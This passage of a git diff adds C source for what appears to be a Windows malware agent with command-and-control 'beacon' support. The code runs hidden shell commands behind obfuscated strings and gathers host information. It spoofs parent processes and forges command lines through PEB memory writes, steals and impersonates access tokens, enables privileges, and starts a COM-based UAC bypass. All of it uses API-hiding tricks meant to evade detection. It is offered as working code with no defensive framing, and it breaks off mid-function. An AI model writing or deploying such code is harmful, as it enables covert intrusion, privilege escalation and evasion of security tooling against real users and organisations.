FILE_SHARE_WRITE, + &sa, OPEN_EXISTING, 0, NULL); + + /* XOR-obfuscated "cmd.exe" to avoid plaintext in .rdata */ + static const unsigned char k_cx[] = {0xdd,0xd3,0xda,0x90,0xdb,0xc6,0xdb}; /* XOR 0xbe */ + char cx[8] = {0}; + { volatile unsigned char _x = 0xbe; + for (int _i = 0; _i < (int)sizeof(k_cx); _i++) cx[_i] = k_cx[_i] ^ _x; } + + volatile char redir[6]; /* " 2>&1" */ + redir[0]=0x20; redir[1]=0x32; redir[2]=0x3e; redir[3]=0x26; redir[4]=0x31; redir[5]=0x00; + + char full_cmd[4096]; + snprintf(full_cmd, sizeof(full_cmd), "%s /C %s%s", cx, cmdline, (const char *)redir); + memset(cx, 0, sizeof(cx)); + + STARTUPINFOA si; + PROCESS_INFORMATION pi; + memset(&si, 0, sizeof(si)); + memset(&pi, 0, sizeof(pi)); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + si.hStdOutput = pipe_wr; + si.hStdError = pipe_wr; + si.hStdInput = (hNull != INVALID_HANDLE_VALUE) ? hNull : NULL; + + BOOL ok = CreateProcessA(NULL, full_cmd, NULL, NULL, + TRUE, CREATE_NO_WINDOW, + NULL, NULL, &si, &pi); + if (hNull != INVALID_HANDLE_VALUE) CloseHandle(hNull); + CloseHandle(pipe_wr); + + if (!ok) { + CloseHandle(pipe_rd); + DWORD _err = GetLastError(); + /* "[e:%lu]\n" built at runtime */ + volatile char efmt[10]; + efmt[0]=0x5b; efmt[1]=0x65; efmt[2]=0x3a; efmt[3]=0x25; + efmt[4]=0x6c; efmt[5]=0x75; efmt[6]=0x5d; efmt[7]=0x0a; efmt[8]=0x00; +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wformat-nonliteral" + snprintf(output_buf, output_size, (const char *)efmt, _err); +#pragma GCC diagnostic pop + return -1; + } + + /* read output with 30s timeout */ + DWORD timeout_ms = 30000; + DWORD start = GetTickCount(); + size_t offset = 0; + DWORD bytes_read = 0; + + while (offset < output_size - 1) { + if (GetTickCount() - start > timeout_ms) break; + + DWORD avail = 0; + if (!PeekNamedPipe(pipe_rd, NULL, 0, NULL, &avail, NULL)) break; + + if (avail == 0) { + if (WaitForSingleObject(pi.hProcess, 0) == WAIT_OBJECT_0) break; + Sleep(50); + continue; + } + + DWORD to_read = avail; + if (to_read > (DWORD)(output_size - 1 - offset)) + to_read = (DWORD)(output_size - 1 - offset); + + if (!ReadFile(pipe_rd, output_buf + offset, to_read, &bytes_read, NULL)) break; + offset += bytes_read; + } + + DWORD extra = 0; + while (offset < output_size - 1 && + ReadFile(pipe_rd, output_buf + offset, 1, &extra, NULL) && extra > 0) + offset += extra; + + output_buf[offset] = '\0'; + + if (offset == 0) + strncpy(output_buf, "(no output)", output_size - 1); + + WaitForSingleObject(pi.hProcess, 5000); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + CloseHandle(pipe_rd); + return 0; +} + +/* collect basic system info */ + +int cmd_sysinfo(char *output_buf, size_t output_size) +{ + char hostname[256] = {0}; + char username[128] = {0}; + DWORD sz; + + sz = sizeof(hostname); + _sgcna(hostname, &sz); + sz = sizeof(username); + GetUserNameA(username, &sz); + + SYSTEM_INFO si; + _gns(&si); + + MEMORYSTATUSEX mem; + memset(&mem, 0, sizeof(mem)); + mem.dwLength = sizeof(mem); + _gmse(&mem); + + snprintf(output_buf, output_size, + "Hostname : %s\n" + "Username : %s\n" + "OS Arch : %s\n" + "Processors: %lu\n" + "RAM Total : %llu MB\n" + "RAM Free : %llu MB\n", + hostname, + username, + si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ? "x64" : "x86", + si.dwNumberOfProcessors, + mem.ullTotalPhys / (1024*1024), + mem.ullAvailPhys / (1024*1024)); + return 0; +} diff --git a/agent/src/commands/spawn.c b/agent/src/commands/spawn.c new file mode 100644 index 0000000..4468329 --- /dev/null +++ b/agent/src/commands/spawn.c @@ -0,0 +1,260 @@ +#include "commands.h" +#include "inject.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include + +#define PP_CMDLINE_OFF 0x70 /* RTL_USER_PROCESS_PARAMETERS.CommandLine (x64) */ +#define PEB_PARAMS_OFF 0x20 /* PEB.ProcessParameters (x64) */ + +#ifndef NTSTATUS +typedef LONG NTSTATUS; +#endif + +/* Dynamic ResumeThread — removes from IAT */ +static DWORD _rt(HANDLE h) +{ + static DWORD (WINAPI *fn)(HANDLE) = NULL; + if (!fn) { + char fs[16], ks[16]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_ResumeThread); i++) fs[i] = (char)(EVS_fn_ResumeThread[i] ^ xk); + fs[sizeof(EVS_fn_ResumeThread)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); + SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (DWORD (WINAPI *)(HANDLE))GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(h) : (DWORD)-1; +} + +typedef NTSTATUS (WINAPI *NtQIP_t)(HANDLE, DWORD, PVOID, ULONG, PULONG); +typedef NTSTATUS (NTAPI *NtRVM_t)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T); +typedef NTSTATUS (NTAPI *NtWVM_t)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T); + +/* NtReadVirtualMemory — removes ReadProcessMemory from IAT */ +static NtRVM_t _get_nrvm(void) { + static NtRVM_t fn = NULL; + if (!fn) { + char fs[24], ns[12]; volatile unsigned char k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_NtReadVirtualMemory); i++) fs[i] = (char)(EVS_fn_NtReadVirtualMemory[i] ^ k); + fs[sizeof(EVS_fn_NtReadVirtualMemory)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_ntdll); i++) ns[i] = (char)(EVS_dll_ntdll[i] ^ k); + ns[sizeof(EVS_dll_ntdll)] = '\0'; + HMODULE m = _peb_module(ns); SecureZeroMemory(ns, sizeof(ns)); + if (m) fn = (NtRVM_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn; +} + +/* NtWriteVirtualMemory — removes WriteProcessMemory from IAT */ +static NtWVM_t _get_nwvm(void) { + static NtWVM_t fn = NULL; + if (!fn) { + char fs[24], ns[12]; volatile unsigned char k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_NtWriteVirtualMemory); i++) fs[i] = (char)(EVS_fn_NtWriteVirtualMemory[i] ^ k); + fs[sizeof(EVS_fn_NtWriteVirtualMemory)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_ntdll); i++) ns[i] = (char)(EVS_dll_ntdll[i] ^ k); + ns[sizeof(EVS_dll_ntdll)] = '\0'; + HMODULE m = _peb_module(ns); SecureZeroMemory(ns, sizeof(ns)); + if (m) fn = (NtWVM_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn; +} + +/* Minimal PROCESS_BASIC_INFORMATION */ +typedef struct { + LONG_PTR ExitStatus; + PVOID PebBaseAddress; + ULONG_PTR AffinityMask; + LONG_PTR BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; +} PBI; + +static DWORD _find_explorer(void) +{ + char _en[13]; volatile unsigned char _k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_str_explorer_exe); i++) _en[i] = (char)(EVS_str_explorer_exe[i] ^ _k); + _en[sizeof(EVS_str_explorer_exe)] = '\0'; + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) { SecureZeroMemory(_en, sizeof(_en)); return 0; } + PROCESSENTRY32 pe = {sizeof(pe)}; + DWORD pid = 0; + if (Process32First(snap, &pe)) do { + if (_stricmp(pe.szExeFile, _en) == 0) + { pid = pe.th32ProcessID; break; } + } while (Process32Next(snap, &pe)); + CloseHandle(snap); + SecureZeroMemory(_en, sizeof(_en)); + return pid; +} + +int cmd_spawn(const char *exe_path, const char *fake_cmdline, + const char *real_cmdline, + char *output_buf, size_t output_size) +{ + if (!exe_path || !exe_path[0] || !fake_cmdline || !fake_cmdline[0]) { + snprintf(output_buf, output_size, + "[spawn] usage: spawn [real_args]\n"); + return -1; + } + + /* build fake cmdline: pad so real cmdline fits in the same buffer */ + char fake_full[2048]; + snprintf(fake_full, sizeof(fake_full), "%s %s", exe_path, fake_cmdline); + + size_t real_len = real_cmdline ? strlen(real_cmdline) : 0; + size_t fake_len = strlen(fake_full); + if (real_len > fake_len) { + /* pad with spaces */ + size_t needed = real_len - fake_len; + if (needed < sizeof(fake_full) - fake_len - 1) { + for (size_t i = 0; i < needed; i++) + fake_full[fake_len + i] = ' '; + fake_full[fake_len + needed] = '\0'; + } + } + + /* PPID spoofing: use explorer.exe as parent */ + DWORD ppid = _find_explorer(); + + STARTUPINFOEXA si; + memset(&si, 0, sizeof(si)); + si.StartupInfo.cb = sizeof(si); + si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW; + si.StartupInfo.wShowWindow = SW_HIDE; + + SIZE_T attr_sz = 0; + LPPROC_THREAD_ATTRIBUTE_LIST attr_list = NULL; + + if (ppid) { + InitializeProcThreadAttributeList(NULL, 1, 0, &attr_sz); + attr_list = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(attr_sz); + if (attr_list) { + InitializeProcThreadAttributeList(attr_list, 1, 0, &attr_sz); + HANDLE hParent = inject_nt_open_process(ppid, PROCESS_CREATE_PROCESS); + if (hParent) { + UpdateProcThreadAttribute(attr_list, 0, + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, + &hParent, sizeof(hParent), NULL, NULL); + /* hParent closed after CreateProcess */ + } + si.lpAttributeList = attr_list; + } + } + + PROCESS_INFORMATION pi = {0}; + BOOL ok = CreateProcessA( + exe_path, + fake_full, + NULL, NULL, FALSE, + CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, + NULL, NULL, + &si.StartupInfo, &pi); + + if (attr_list) { + DeleteProcThreadAttributeList(attr_list); + free(attr_list); + } + + if (!ok) { + snprintf(output_buf, output_size, + "[spawn] CreateProcess failed: %lu\n", GetLastError()); + return -1; + } + + /* if no real cmdline, just resume and return */ + if (!real_cmdline || !real_cmdline[0]) { + _rt(pi.hThread); + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + snprintf(output_buf, output_size, + "[spawn] pid=%lu fake_cmdline=%s\n", + (unsigned long)pi.dwProcessId, fake_full); + return 0; + } + + /* find CommandLine.Buffer in target PEB */ + char _sqn[28], _sn[12]; volatile unsigned char _xk = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_fn_NtQueryInformationProcess); _i++) _sqn[_i] = (char)(EVS_fn_NtQueryInformationProcess[_i] ^ _xk); + _sqn[sizeof(EVS_fn_NtQueryInformationProcess)] = '\0'; + for (int _i = 0; _i < (int)sizeof(EVS_dll_ntdll); _i++) _sn[_i] = (char)(EVS_dll_ntdll[_i] ^ _xk); + _sn[sizeof(EVS_dll_ntdll)] = '\0'; + NtQIP_t pfnQIP = (NtQIP_t)(void *)GetProcAddress(_peb_module(_sn), _sqn); + SecureZeroMemory(_sqn, sizeof(_sqn)); SecureZeroMemory(_sn, sizeof(_sn)); + + if (!pfnQIP) goto resume; + + PBI pbi = {0}; + NTSTATUS st = pfnQIP(pi.hProcess, 0 /* ProcessBasicInformation */, + &pbi, sizeof(pbi), NULL); + if (st) goto resume; + + /* read ProcessParameters pointer from PEB */ + PVOID params_ptr = NULL; + { NtRVM_t _r = _get_nrvm(); + if (!_r || _r(pi.hProcess, (BYTE *)pbi.PebBaseAddress + PEB_PARAMS_OFF, + ¶ms_ptr, sizeof(PVOID), NULL) || !params_ptr) + goto resume; } + + /* read CommandLine UNICODE_STRING fields */ + USHORT cl_len = 0, cl_maxlen = 0; + PWSTR cl_buf = NULL; + { NtRVM_t _r = _get_nrvm(); + if (_r) { + _r(pi.hProcess, (BYTE *)params_ptr + PP_CMDLINE_OFF, + &cl_len, sizeof(USHORT), NULL); + _r(pi.hProcess, (BYTE *)params_ptr + PP_CMDLINE_OFF + 2, + &cl_maxlen, sizeof(USHORT), NULL); + _r(pi.hProcess, (BYTE *)params_ptr + PP_CMDLINE_OFF + 8, + &cl_buf, sizeof(PWSTR), NULL); + } + } + + if (!cl_buf || cl_maxlen == 0) goto resume; + + /* convert real cmdline to UTF-16 */ + WCHAR real_wide[2048] = {0}; + int real_wchars = MultiByteToWideChar(CP_ACP, 0, real_cmdline, -1, + real_wide, 2048); + if (real_wchars <= 0) goto resume; + + USHORT real_bytes = (USHORT)((real_wchars - 1) * 2); + + if (real_bytes > cl_maxlen) { + /* Real too long — skip overwrite, just resume with fake */ + goto resume; + } + + /* Overwrite the CommandLine buffer in target */ + { NtWVM_t _w = _get_nwvm(); + if (_w) { + _w(pi.hProcess, cl_buf, real_wide, real_bytes + 2, NULL); + _w(pi.hProcess, (BYTE *)params_ptr + PP_CMDLINE_OFF, + &real_bytes, sizeof(USHORT), NULL); + } + } + +resume: + _rt(pi.hThread); + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + + snprintf(output_buf, output_size, + "[spawn] pid=%lu\n" + " visible: %s\n" + " actual: %s\n", + (unsigned long)pi.dwProcessId, + fake_full, + real_cmdline ? real_cmdline : "(same as visible)"); + return 0; +} diff --git a/agent/src/commands/token.c b/agent/src/commands/token.c new file mode 100644 index 0000000..469b98a --- /dev/null +++ b/agent/src/commands/token.c @@ -0,0 +1,299 @@ +#include "commands.h" +#include "inject.h" +#include "adv_lazy.h" +#include +#include +#include +#include + +/* one active impersonation token at a time */ +static volatile HANDLE s_imp_token = NULL; + +static void _token_info(HANDLE htok, char *out, size_t outsz) +{ + /* get username */ + DWORD needed = 0; + GetTokenInformation(htok, TokenUser, NULL, 0, &needed); + TOKEN_USER *tu = needed ? (TOKEN_USER *)malloc(needed) : NULL; + char uname[256] = "?", domain[256] = "?"; + if (tu && GetTokenInformation(htok, TokenUser, tu, needed, &needed)) { + DWORD nlen = 256, dlen = 256; + SID_NAME_USE use; + LookupAccountSidA(NULL, tu->User.Sid, uname, &nlen, domain, &dlen, &use); + } + free(tu); + + /* get integrity level */ + needed = 0; + GetTokenInformation(htok, TokenIntegrityLevel, NULL, 0, &needed); + TOKEN_MANDATORY_LABEL *tml = needed ? (TOKEN_MANDATORY_LABEL *)malloc(needed) : NULL; + const char *integ = "?"; + if (tml && GetTokenInformation(htok, TokenIntegrityLevel, tml, needed, &needed)) { + DWORD rid = *GetSidSubAuthority(tml->Label.Sid, + (DWORD)(*GetSidSubAuthorityCount(tml->Label.Sid) - 1)); + if (rid >= SECURITY_MANDATORY_SYSTEM_RID) integ = "SYSTEM"; + else if (rid >= SECURITY_MANDATORY_HIGH_RID) integ = "HIGH"; + else if (rid >= SECURITY_MANDATORY_MEDIUM_RID) integ = "MEDIUM"; + else if (rid >= SECURITY_MANDATORY_LOW_RID) integ = "LOW"; + else integ = "UNTRUSTED"; + } + free(tml); + + /* check impersonation type */ + TOKEN_TYPE ttype = TokenPrimary; + DWORD ttsz = sizeof(ttype); + GetTokenInformation(htok, TokenType, &ttype, ttsz, &ttsz); + const char *imp = ""; + if (ttype == TokenImpersonation) { + SECURITY_IMPERSONATION_LEVEL lvl = SecurityAnonymous; + DWORD lsz = sizeof(lvl); + GetTokenInformation(htok, TokenImpersonationLevel, &lvl, lsz, &lsz); + imp = (lvl == SecurityDelegation) ? " [delegation]" + : (lvl == SecurityImpersonation) ? " [impersonation]" + : " [anonymous/identify]"; + } + + snprintf(out, outsz, "%s\\%s [%s]%s\n", domain, uname, integ, imp); +} + +int cmd_getuid(char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 64) return -1; + output_buf[0] = '\0'; + + /* try thread token first, fall back to process token */ + HANDLE htok = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->OpenThreadToken || !_a->OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &htok) || !htok) + if (_a->OpenProcessToken) _a->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htok); } + + if (!htok) { + snprintf(output_buf, output_size, + "[getuid] OpenToken failed: %lu\n", GetLastError()); + return -1; + } + _token_info(htok, output_buf, output_size); + CloseHandle(htok); + return 0; +} + +int cmd_steal_token(unsigned long pid, char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 64) return -1; + output_buf[0] = '\0'; + + HANDLE hproc = inject_nt_open_process((DWORD)pid, PROCESS_QUERY_INFORMATION); + if (!hproc) { + snprintf(output_buf, output_size, + "[st] open(%lu) failed\n", pid); + return -1; + } + + HANDLE hptok = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->OpenProcessToken || !_a->OpenProcessToken(hproc, + TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, + &hptok)) { + CloseHandle(hproc); + snprintf(output_buf, output_size, + "[st] OpenProcessToken failed: %lu\n", GetLastError()); + return -1; + } } + CloseHandle(hproc); + + HANDLE hdup = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->DuplicateTokenEx || !_a->DuplicateTokenEx(hptok, TOKEN_ALL_ACCESS, NULL, + SecurityImpersonation, TokenImpersonation, &hdup)) { + CloseHandle(hptok); + snprintf(output_buf, output_size, + "[st] DuplicateTokenEx failed: %lu\n", GetLastError()); + return -1; + } } + CloseHandle(hptok); + + { const adv_api_t *_a = adv_get(); + if (!_a->ImpersonateLoggedOnUser || !_a->ImpersonateLoggedOnUser(hdup)) { + CloseHandle(hdup); + snprintf(output_buf, output_size, + "[st] ImpersonateLoggedOnUser failed: %lu\n", + GetLastError()); + return -1; + } } + + /* Atomically swap stored token, close old one if any */ + HANDLE old = (HANDLE)InterlockedExchangePointer( + (volatile PVOID *)&s_imp_token, hdup); + if (old) CloseHandle(old); + + char info[256] = {0}; + _token_info(hdup, info, sizeof(info)); + snprintf(output_buf, output_size, + "[st] pid=%lu -> %s", pid, info); + return 0; +} + +int cmd_rev2self(char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 64) return -1; + output_buf[0] = '\0'; + + { const adv_api_t *_a = adv_get(); if (_a->RevertToSelf) _a->RevertToSelf(); } + HANDLE old = (HANDLE)InterlockedExchangePointer( + (volatile PVOID *)&s_imp_token, NULL); + if (old) CloseHandle(old); + + snprintf(output_buf, output_size, "[r2s] reverted\n"); + return 0; +} + +int cmd_make_token(const char *domain_user, const char *password, + char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 64) return -1; + output_buf[0] = '\0'; + + /* Split "DOMAIN\user" → domain + user; bare "user" defaults domain to "." */ + char domain[256] = "."; + char user[256] = {0}; + const char *bs = strchr(domain_user, '\\'); + if (bs) { + size_t dlen = (size_t)(bs - domain_user); + if (dlen >= sizeof(domain)) dlen = sizeof(domain) - 1; + memcpy(domain, domain_user, dlen); + domain[dlen] = '\0'; + strncpy(user, bs + 1, sizeof(user) - 1); + } else { + strncpy(user, domain_user, sizeof(user) - 1); + } + + HANDLE htok = NULL; + /* + * LOGON32_LOGON_NEW_CREDENTIALS: local identity stays current user; + * network auth uses provided creds. Equivalent to runas /netonly. + * Does not require SeDebugPrivilege. + */ + { const adv_api_t *_a = adv_get(); + if (!_a->LogonUserA || !_a->LogonUserA(user, domain, password, + LOGON32_LOGON_NEW_CREDENTIALS, + LOGON32_PROVIDER_WINNT50, + &htok)) { + snprintf(output_buf, output_size, + "[mt] LogonUser failed: %lu\n", GetLastError()); + return -1; + } } + + { const adv_api_t *_a = adv_get(); + if (!_a->ImpersonateLoggedOnUser || !_a->ImpersonateLoggedOnUser(htok)) { + CloseHandle(htok); + snprintf(output_buf, output_size, + "[mt] ImpersonateLoggedOnUser failed: %lu\n", + GetLastError()); + return -1; + } } + + HANDLE old = (HANDLE)InterlockedExchangePointer( + (volatile PVOID *)&s_imp_token, htok); + if (old) CloseHandle(old); + + snprintf(output_buf, output_size, + "[mt] %s\\%s (network creds set)\n", domain, user); + return 0; +} + +/* ---- cmd_privs ---- */ + +int cmd_privs(const char *action, const char *priv_name, + char *output_buf, size_t output_size) +{ + const adv_api_t *adv = adv_get(); + HANDLE hTok; + if (!adv->OpenProcessToken || + !adv->OpenProcessToken(GetCurrentProcess(), + TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hTok)) { + snprintf(output_buf, output_size, + "[privs] OpenProcessToken failed: %lu\n", GetLastError()); + return -1; + } + + /* Default action = list */ + if (!action || !action[0] || strcmp(action, "list") == 0) { + DWORD needed = 0; + GetTokenInformation(hTok, TokenPrivileges, NULL, 0, &needed); + TOKEN_PRIVILEGES *tp = (TOKEN_PRIVILEGES *)malloc(needed); + if (!tp) { CloseHandle(hTok); return -1; } + GetTokenInformation(hTok, TokenPrivileges, tp, needed, &needed); + + size_t pos = 0; + int n = snprintf(output_buf + pos, output_size - pos, + "%-48s %s\n", "Privilege", "State"); + if (n > 0) pos += (size_t)n; + + for (DWORD i = 0; i < tp->PrivilegeCount; i++) { + char name[64] = {0}; + DWORD nsz = sizeof(name); + if (adv->LookupPrivilegeNameA) + adv->LookupPrivilegeNameA(NULL, &tp->Privileges[i].Luid, name, &nsz); + + DWORD attr = tp->Privileges[i].Attributes; + const char *state = + (attr & SE_PRIVILEGE_ENABLED) ? "Enabled" : + (attr & SE_PRIVILEGE_ENABLED_BY_DEFAULT) ? "Default" : + "Disabled"; + + n = snprintf(output_buf + pos, output_size - pos, + " %-46s %s\n", name, state); + if (n > 0 && (size_t)n < output_size - pos) pos += (size_t)n; + } + free(tp); + CloseHandle(hTok); + return 0; + } + + if (strcmp(action, "enable") == 0 || strcmp(action, "disable") == 0) { + if (!priv_name || !priv_name[0]) { + snprintf(output_buf, output_size, + "[privs] usage: privs enable|disable \n"); + CloseHandle(hTok); + return -1; + } + LUID luid; + if (!adv->LookupPrivilegeValueA || + !adv->LookupPrivilegeValueA(NULL, priv_name, &luid)) { + snprintf(output_buf, output_size, + "[privs] unknown privilege: %s\n", priv_name); + CloseHandle(hTok); + return -1; + } + TOKEN_PRIVILEGES tp; + tp.PrivilegeCount = 1; + tp.Privileges[0].Luid = luid; + tp.Privileges[0].Attributes = + (strcmp(action, "enable") == 0) ? SE_PRIVILEGE_ENABLED : 0; + + if (adv->AdjustTokenPrivileges) + adv->AdjustTokenPrivileges(hTok, FALSE, &tp, 0, NULL, NULL); + DWORD err = GetLastError(); + CloseHandle(hTok); + + if (err == ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[privs] %s: %s\n", action, priv_name); + return 0; + } + if (err == ERROR_NOT_ALL_ASSIGNED) { + snprintf(output_buf, output_size, + "[privs] %s: %s (not held by token - steal SYSTEM token first)\n", + action, priv_name); + return -1; + } + snprintf(output_buf, output_size, + "[privs] failed: %lu\n", err); + return -1; + } + + CloseHandle(hTok); + snprintf(output_buf, output_size, + "[privs] usage: privs [list | enable | disable ]\n"); + return -1; +} diff --git a/agent/src/commands/uac.c b/agent/src/commands/uac.c new file mode 100644 index 0000000..831ca7a --- /dev/null +++ b/agent/src/commands/uac.c @@ -0,0 +1,849 @@ +#include "commands.h" +#include "beacon.h" +#include "evasion.h" +#include "adv_lazy.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include +#include +#include +#include + +#define IL_UNTRUSTED 0 +#define IL_LOW 1 +#define IL_MEDIUM 2 +#define IL_HIGH 3 +#define IL_SYSTEM 4 + +static int get_integrity_level(void) +{ + HANDLE hTok = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->OpenProcessToken || !_a->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hTok)) return -1; } + + DWORD sz = 0; + GetTokenInformation(hTok, TokenIntegrityLevel, NULL, 0, &sz); + TOKEN_MANDATORY_LABEL *tml = (TOKEN_MANDATORY_LABEL *)malloc(sz); + if (!tml) { CloseHandle(hTok); return -1; } + + int il = -1; + if (GetTokenInformation(hTok, TokenIntegrityLevel, tml, sz, &sz)) { + DWORD rid = *GetSidSubAuthority(tml->Label.Sid, + *GetSidSubAuthorityCount(tml->Label.Sid) - 1); + if (rid < 0x1000) il = IL_UNTRUSTED; + else if (rid < 0x2000) il = IL_LOW; + else if (rid < 0x3000) il = IL_MEDIUM; + else if (rid < 0x4000) il = IL_HIGH; + else il = IL_SYSTEM; + } + free(tml); + CloseHandle(hTok); + return il; +} + +static int is_admin_group(void) +{ + BOOL admin = FALSE; + SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY; + PSID admin_sid = NULL; + if (AllocateAndInitializeSid(&nt, 2, + SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, + 0,0,0,0,0,0, &admin_sid)) { + CheckTokenMembership(NULL, admin_sid, &admin); + FreeSid(admin_sid); + } + return (int)admin; +} + +static WCHAR *to_wide(const char *s) +{ + int n = MultiByteToWideChar(CP_UTF8, 0, s, -1, NULL, 0); + if (n <= 0) return NULL; + WCHAR *w = (WCHAR *)malloc((size_t)n * sizeof(WCHAR)); + if (w) MultiByteToWideChar(CP_UTF8, 0, s, -1, w, n); + return w; +} + +static void split_cmdline(const char *cmdline, char *exe_buf, size_t exe_sz, + char *args_buf, size_t args_sz) +{ + exe_buf[0] = args_buf[0] = '\0'; + if (!cmdline || !*cmdline) return; + + if (cmdline[0] == '"') { + const char *end = strchr(cmdline + 1, '"'); + if (end) { + size_t n = (size_t)(end - cmdline - 1); + if (n >= exe_sz) n = exe_sz - 1; + memcpy(exe_buf, cmdline + 1, n); + exe_buf[n] = '\0'; + const char *rest = end + 1; + while (*rest == ' ') rest++; + strncpy(args_buf, rest, args_sz - 1); + args_buf[args_sz - 1] = '\0'; + return; + } + } + const char *sp = strchr(cmdline, ' '); + if (!sp) { + strncpy(exe_buf, cmdline, exe_sz - 1); + exe_buf[exe_sz - 1] = '\0'; + } else { + size_t n = (size_t)(sp - cmdline); + if (n >= exe_sz) n = exe_sz - 1; + memcpy(exe_buf, cmdline, n); + exe_buf[n] = '\0'; + const char *rest = sp + 1; + while (*rest == ' ') rest++; + strncpy(args_buf, rest, args_sz - 1); + args_buf[args_sz - 1] = '\0'; + } +} + +static const IID _iid_ICMLuaUtil = + {0x6EDD6D74, 0xC007, 0x4E75, {0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C}}; + +typedef HRESULT (STDMETHODCALLTYPE *ICMLuaUtil_ShellExec_t)( + void *pThis, + LPCWSTR pwszFile, + LPCWSTR pwszParameters, + LPCWSTR pwszDirectory, + ULONG nShowCmd, + ULONG dwFlags +); + +static int bypass_com(const char *cmdline, char *out, size_t outsz) +{ + if (!cmdline || !*cmdline) + return snprintf(out, outsz, "e:0\n"), -1; + + WCHAR *exe_w = to_wide(cmdline); + WCHAR *args_w = NULL; + if (!exe_w) return snprintf(out, outsz, "e:w\n"), -1; + + HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); + BOOL com_init = SUCCEEDED(hr) || hr == RPC_E_CHANGED_MODE; + + WCHAR moniker[80]; + { volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_elevation_moniker); _i++) + moniker[_i] = (WCHAR)(EVS_str_elevation_moniker[_i] ^ _k); + moniker[sizeof(EVS_str_elevation_moniker)] = L'\0'; } + + BIND_OPTS3 bo; + memset(&bo, 0, sizeof(bo)); + bo.cbStruct = sizeof(BIND_OPTS3); + bo.dwClassContext = CLSCTX_LOCAL_SERVER; + + void *pObj = NULL; + hr = CoGetObject(moniker, (BIND_OPTS *)&bo, &_iid_ICMLuaUtil, &pObj); + if (FAILED(hr) || !pObj) { + free(exe_w); free(args_w); + if (com_init) CoUninitialize(); + return snprintf(out, outsz, "e:cg %08lx\n", hr), -1; + } + + ICMLuaUtil_ShellExec_t fn_ShellExec = + (ICMLuaUtil_ShellExec_t)(*(void***)pObj)[9]; + + hr = fn_ShellExec(pObj, exe_w, L"", NULL, 1 /*SW_SHOWNORMAL*/, 0); + + ((IUnknown *)pObj)->lpVtbl->Release((IUnknown *)pObj); + free(exe_w); + if (com_init) CoUninitialize(); + + if (FAILED(hr)) + return snprintf(out, outsz, "e:se %08lx\n", hr), -1; + + return snprintf(out, outsz, "ok\n"); +} + +static int count_proc(const char *exename) +{ + DWORD self = GetCurrentProcessId(); + int n = 0; + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) return 0; + PROCESSENTRY32 pe = { sizeof(pe) }; + if (Process32First(snap, &pe)) { + do { + if (_stricmp(pe.szExeFile, exename) == 0 && pe.th32ProcessID != self) + n++; + } while (Process32Next(snap, &pe)); + } + CloseHandle(snap); + return n; +} + +static int reg_set_sz(HKEY root, const char *subkey, const char *valname, const char *data) +{ + HKEY hk; + if (RegCreateKeyExA(root, subkey, 0, NULL, 0, KEY_SET_VALUE, NULL, &hk, NULL) + != ERROR_SUCCESS) return -1; + int rc = RegSetValueExA(hk, valname, 0, REG_SZ, + (const BYTE *)data, (DWORD)(strlen(data) + 1)); + RegCloseKey(hk); + return rc == ERROR_SUCCESS ? 0 : -1; +} + +static void reg_del_tree(HKEY root, const char *subkey) +{ + typedef LONG (WINAPI *RegDelTree_t)(HKEY, LPCSTR); + static RegDelTree_t fn 